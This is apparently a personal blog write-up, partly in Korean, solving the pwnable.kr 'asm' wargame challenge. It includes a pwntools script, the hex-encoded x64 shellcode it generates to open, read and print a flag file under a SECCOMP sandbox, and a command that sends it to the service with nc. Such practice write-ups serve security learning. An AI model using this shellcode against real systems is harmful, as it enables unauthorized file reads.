hOwDayS 선린 10720

pwnable asm 본문

공부/pwnable.kr

pwnable asm

hOwDayS 2018. 1. 12. 01:13


solve.py



1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
 
context(arch='amd64',os='linux'#Setting
 
shellcode=''

 #파일이름 저장
shellcode+=shellcraft.pushstr("this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong")
shellcode+=shellcraft.open('rsp',0#파일
shellcode+=shellcraft.read('rax','rsp',100) #rsp에 저장
shellcode+=shellcraft.write(1,'rsp',100#rsp 출력
 
print asm(shellcode).encode('hex')
 
 
cs


output 


48b801010101010101015048b86e316e316e6f66014831042448b86f306f306f306f305048b830303030303030305048b86f6f6f6f303030305048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b830303030306f6f6f5048b830303030303030305048b830303030303030305048b86f6f6f6f303030305048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b8735f766572795f6c5048b8655f6e616d655f695048b85f7468655f66696c5048b86c652e736f7272795048b85f746869735f66695048b86173655f726561645048b866696c655f706c655048b86b725f666c61675f5048b870776e61626c652e5048b8746869735f69735f504889e731d231f66a02580f054889c731c06a645a4889e60f056a015f6a645a4889e66a01580f05



asm@ubuntu: ~$ (python -c 'print "48b801010101010101015048b86e316e316e6f66014831042448b86f306f306f306f305048b830303030303030305048b86f6f6f6f303030305048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b830303030306f6f6f5048b830303030303030305048b830303030303030305048b86f6f6f6f303030305048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b86f6f6f6f6f6f6f6f5048b8735f766572795f6c5048b8655f6e616d655f695048b85f7468655f66696c5048b86c652e736f7272795048b85f746869735f66695048b86173655f726561645048b866696c655f706c655048b86b725f666c61675f5048b870776e61626c652e5048b8746869735f69735f504889e731d231f66a02580f054889c731c06a645a4889e60f056a015f6a645a4889e66a01580f05".decode("hex")'; cat) | nc 0 0926


output


Welcome to shellcoding practice challenge.

In this challenge, you can run your x64 shellcode under SECCOMP sandbox.

Try to make shellcode that spits flag using open()/read()/write() systemcalls only.

If this does not challenge you. you should play 'asg' challenge :)

give me your x64 shellcode: FLAG_ERASED

lease_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooo





'공부 > pwnable.kr' 카테고리의 다른 글

pwnable.kr simplelogin  (0) 2018.01.20
pwnable.kr brainfuck  (2) 2018.01.20
pwnable uaf  (0) 2018.01.11
pwnable.kr lotto  (0) 2018.01.11
pwnable.kr coin1  (0) 2018.01.10
'공부/pwnable.kr' Related Articles more
Comments